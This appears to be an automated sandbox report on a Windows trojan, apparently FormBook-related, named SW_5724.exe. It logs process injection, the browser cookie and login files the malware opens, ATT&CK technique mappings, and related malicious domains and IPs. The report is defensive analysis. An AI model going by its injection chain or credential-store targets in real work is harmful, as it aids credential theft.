                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtQueryInformationProcess: Direct from: 0x76EF2C26
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtResumeThread: Direct from: 0x76EF2FBC
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtCreateUserProcess: Direct from: 0x76EF371C
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtWriteVirtualMemory: Direct from: 0x76EF490C
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtSetInformationThread: Direct from: 0x76EE63F9
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtSetInformationThread: Direct from: 0x76EF2B4C
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtReadVirtualMemory: Direct from: 0x76EF2E8C
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; NtCreateKey: Direct from: 0x76EF2C6C
                Source: C:\Users\user\Desktop\SW_5724.exe; Section loaded: NULL target: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\SW_5724.exe; Section loaded: NULL target: C:\Windows\SysWOW64\regini.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe; Section loaded: NULL target: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe protection: read write
                Source: C:\Windows\SysWOW64\regini.exe; Section loaded: NULL target: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\regini.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe; Thread register set: target process: 7084
                Source: C:\Windows\SysWOW64\regini.exe; Thread APC queued: target process: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                Source: C:\Users\user\Desktop\SW_5724.exe; Process created: C:\Users\user\Desktop\SW_5724.exe "C:\Users\user\Desktop\SW_5724.exe"
                Source: C:\Users\user\Desktop\SW_5724.exe; Process created: C:\Users\user\Desktop\SW_5724.exe "C:\Users\user\Desktop\SW_5724.exe"
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe; Process created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: BmUrsTIvMw.exe, 00000009.00000000.2257604704.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 00000009.00000002.4515119989.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515350775.0000000001221000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager
                Source: BmUrsTIvMw.exe, 00000009.00000000.2257604704.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 00000009.00000002.4515119989.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515350775.0000000001221000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
                Source: BmUrsTIvMw.exe, 00000009.00000000.2257604704.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 00000009.00000002.4515119989.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515350775.0000000001221000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
                Source: BmUrsTIvMw.exe, 00000009.00000000.2257604704.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 00000009.00000002.4515119989.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4515350775.0000000001221000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\SW_5724.exe; Queries volume information: C:\Users\user\Desktop\SW_5724.exe VolumeInformation
                Source: C:\Users\user\Desktop\SW_5724.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\SW_5724.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\SW_5724.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\SW_5724.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SW_5724.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Users\user\Desktop\SW_5724.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match; File source: 6.2.SW_5724.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 6.2.SW_5724.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0000000B.00000002.4517476095.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.4514626352.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.4515595244.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2430161361.0000000007360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000009.00000002.4515540359.0000000003660000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2341900856.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\regini.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\regini.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\regini.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\regini.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\regini.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\regini.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\regini.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\regini.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\regini.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match; File source: 6.2.SW_5724.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 6.2.SW_5724.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0000000B.00000002.4517476095.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.4514626352.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.4515595244.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2430161361.0000000007360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000009.00000002.4515540359.0000000003660000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2341900856.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: [1] DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: [312] Process Injection; [1] Abuse Elevation Control Mechanism; [1] DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Defense Evasion: [1] Masquerading; [11] Disable or Modify Tools; [41] Virtualization/Sandbox Evasion; [312] Process Injection; [1] Deobfuscate/Decode Files or Information; [1] Abuse Elevation Control Mechanism; [4] Obfuscated Files or Information; [12] Software Packing; [1] DLL Side-Loading
                Credential Access: [1] OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: [121] Security Software Discovery; [2] Process Discovery; [41] Virtualization/Sandbox Evasion; [1] Application Window Discovery; [2] File and Directory Discovery; [113] System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: [1] Email Collection; [1] Archive Collected Data; [1] Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: [1] Encrypted Channel; [3] Ingress Tool Transfer; [4] Non-Application Layer Protocol; [4] Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                [Behavior graph. ID: 1567396, Sample: SW_5724.exe, Start date: 03/12/2024, Architecture: WINDOWS, Score: 100]

                Source | Detection | Scanner | Label | Link
                SW_5724.exe | 42% | ReversingLabs | Win32.Trojan.Generic |
                SW_5724.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                Name | Malicious | Antivirus Detection | Reputation
                Name | Source | Malicious | Antivirus Detection | Reputation
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                Joe Sandbox version: 41.0.0 Charoite
                Analysis ID: 1567396
                Start date and time: 2024-12-03 14:19:47 +01:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 11m 8s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed: 12
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 2
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: SW_5724.exe
                Detection: MAL
                Classification: mal100.troj.spyw.evad.winEXE@13/7@15/9
                EGA Information:
                • Successful, ratio: 75%
                HCA Information:
                • Successful, ratio: 87%
                • Number of executed functions: 93
                • Number of non-executed functions: 283
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes were analyzed, report is missing behavior information
                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • VT rate limit hit for: SW_5724.exe
                Time | Type | Description
                08:20:38 | API Interceptor | 1x Sleep call for process: SW_5724.exe modified
                08:20:40 | API Interceptor | 13x Sleep call for process: powershell.exe modified
                08:21:44 | API Interceptor | 10265490x Sleep call for process: regini.exe modified
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                • www.learnwithus.site/alu5/
                                                                                Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                • www.beyondfitness.live/fbpt/
                                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                • www.learnwithus.site/alu5/
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                www.ana-silverco.shopquotation.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.90.137
                                                                                specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 104.21.90.137
                                                                                ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 104.21.90.137
                                                                                www.sitioseguro.blogfile.exeGet hashmaliciousFormBookBrowse
                                                                                • 172.67.162.39
                                                                                SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                • 172.67.162.39
                                                                                5674656777985-069688574654 pdf.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.15.100
                                                                                www.remedies.proCV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                • 13.248.169.48
                                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                • 13.248.169.48
                                                                                www.whisperart.netfile.exeGet hashmaliciousFormBookBrowse
                                                                                • 199.59.243.227
                                                                                www.egyshare.xyzCV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                • 13.248.169.48
                                                                                Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                • 13.248.169.48
                                                                                www.dating-apps-az-dn5.xyzA2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                • 199.59.243.227
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                MULTIBAND-NEWHOPEUS72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.79.42
                                                                                quotation.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.107
                                                                                Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.109
                                                                                Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 209.74.77.107
                                                                                specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 209.74.64.187
                                                                                Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.108
                                                                                specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 209.74.77.107
                                                                                A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.109
                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.107
                                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                • 209.74.77.108
                                                                                UNIFIEDLAYER-AS-1USPAGAMENTO CREDIT_AGRICOLE.docGet hashmaliciousXWormBrowse
                                                                                • 192.254.232.209
                                                                                fred.htmlGet hashmaliciousUnknownBrowse
                                                                                • 69.49.245.172
                                                                                https://dsiete.co/share.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 173.254.24.56
                                                                                Po-AD841.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 108.179.234.136
                                                                                V-Mail.msgGet hashmaliciousUnknownBrowse
                                                                                • 69.49.245.172
                                                                                https://protect.checkpoint.com/v2/r01/___https:/vlp6cm34.r.us-east-1.awstrack.me/Q5dmyyux:e7Ke7Kjrfnq.ynintwjuqD.htr*7Kh*7KjOBJBJLTmXFRFSIYBSOlvWZ1QLgoUfHylhY/JnF_riAUpCWczNA0yO_jaB*~*oG6AYM23pBoyDNMJ-PJR-NmPFsN*~*VgZA/PF0HUyICotYzOGFnKvZNBMhC*~*KfYclayEc_La*~*ccZq7wY-S_IKBLwx/KWAAv8MVfzRwNM6LCN8Jigf*~*80C6gkuabRjmLM--7qPAcOAlUFFI__5pCS9Bd6d565556c8b*~*/hi595-9hb*~3*gh-a*~*bg-9bgb-ci5/-b9jf76k5b9g*~*-555555do29l0Y3hHjFJM3POpxyJsMjDY*~*5=957___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOmNkMzFiOWRiNjRlNzYwZWExOWZkZjZlZWU4YmI5NjkyOjc6NjQxYjozOTM5M2Y5MjlmZWNkMGUzMGYzMjUxMGFiZDQ0YjU2Mzg5ODdlNDNlNTAyN2VlYjBmMjQxZjc3Mjg5OGNiMWQxOmg6VDpU%3EGet hashmaliciousUnknownBrowse
                                                                                • 69.49.245.172
                                                                                [EXTERNAL] Fw_ LVW 1201831..emlGet hashmaliciousUnknownBrowse
                                                                                • 69.49.230.198
                                                                                ATT4802.htmlGet hashmaliciousUnknownBrowse
                                                                                • 69.49.245.172
                                                                                http://calcuttaclub.in/images/uanjodgs/florida-access/Get hashmaliciousUnknownBrowse
                                                                                • 162.214.50.135
                                                                                https://public-usa.mkt.dynamics.com/api/orgs/010a432a-e2a3-ef11-8a66-6045bd016f25/r/movKLLTpWUCqpRQQ2_8SfQEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fapp.seesaw.me%252Fpages%252Fshared_item%253Fitem_id%253Ditem.96abdfb3-93cb-482c-822f-f1d275a42e6e%2526share_token%253DDfLCj_YZQZedsrWVvLwerg%2526mode%253Dshare%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%221%22%3Anull%7D%7D&digest=kBeCY6h3I2oKWHussXexCqSpSk%2BEhyyLm0j2TqAuyLY%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15eeGet hashmaliciousUnknownBrowse
                                                                                • 108.167.188.62
                                                                                CLOUDFLARENETUS0200011080.xlsGet hashmaliciousUnknownBrowse
                                                                                • 188.114.96.6
                                                                                Oder Request &Company profile.xlsGet hashmaliciousUnknownBrowse
                                                                                • 188.114.96.6
                                                                                NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 104.21.67.152
                                                                                72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                                • 172.67.218.146
                                                                                quotation.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.90.137
                                                                                0200011080.xlsGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.6
                                                                                Swiftcopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.6
                                                                                Pagamento deposito e fattura proforma firmata.xlsGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.6
                                                                                Swiftcopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.6
                                                                                PO# BBGR2411PO69.xlsGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.6
                                                                                AMAZON-02USNew Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                • 54.179.173.60
                                                                                0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                • 54.150.207.131
                                                                                NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                • 108.158.75.92
                                                                                https://nam05.safelinks.protection.outlook.com.url.atp-redirect.protected-forms.com/XTnQrajg1OGVHZkdSZC9jY09NbW40Z2plNHVuWDhsQVZRZkFYNVBxOWlTekFXSXBLSVRWLyt2WXhuS1hGNVo3UUxGQTRLRVpXNHpLSjVKdDEvbHJLSmtFWjMzbFIxb3IvR2xvdWJ1em5yeTJBK1FXdzF3UG52YXBaVmJBSEJZcXBSdjFvMTh6TmplRHV4azZ6UHkrTnM5dUY2QmVzbVFVRWk5di9PMEZxZ2lXNnM5N2tuOExqN1pyUy0tcEx5Q0xXTTBEOURyNFdnTS0tTTJJM3JGT2w2ZzQxTnorb2NMd1lrZz09?cid=2305347406Get hashmaliciousKnowBe4Browse
                                                                                • 13.227.8.37
                                                                                https://chargeview.liveGet hashmaliciousUnknownBrowse
                                                                                • 3.122.217.79
                                                                                a-r.m-6.SNOOPY.elfGet hashmaliciousGafgytBrowse
                                                                                • 54.171.230.55
                                                                                phish_alert_sp2_2.0.0.0 (8).emlGet hashmaliciousUnknownBrowse
                                                                                • 54.231.135.120
                                                                                https://searchandprint.recipesGet hashmaliciousUnknownBrowse
                                                                                • 108.158.75.111
                                                                                https://es.vecteezy.com/arte-vectorial/20279878-kyd-letra-logo-diseno-en-blanco-antecedentes-kyd-creativo-circulo-letra-logo-concepto-kyd-letra-disenoGet hashmaliciousUnknownBrowse
                                                                                • 52.19.224.221
                                                                                Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                                                • 45.112.123.126
                                                                                No context
                                                                                No context
                                                                                Process:C:\Users\user\Desktop\SW_5724.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1216
                                                                                Entropy (8bit):5.34331486778365
                                                                                Encrypted:false
                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                Malicious:true
                                                                                Reputation:high, very likely benign file
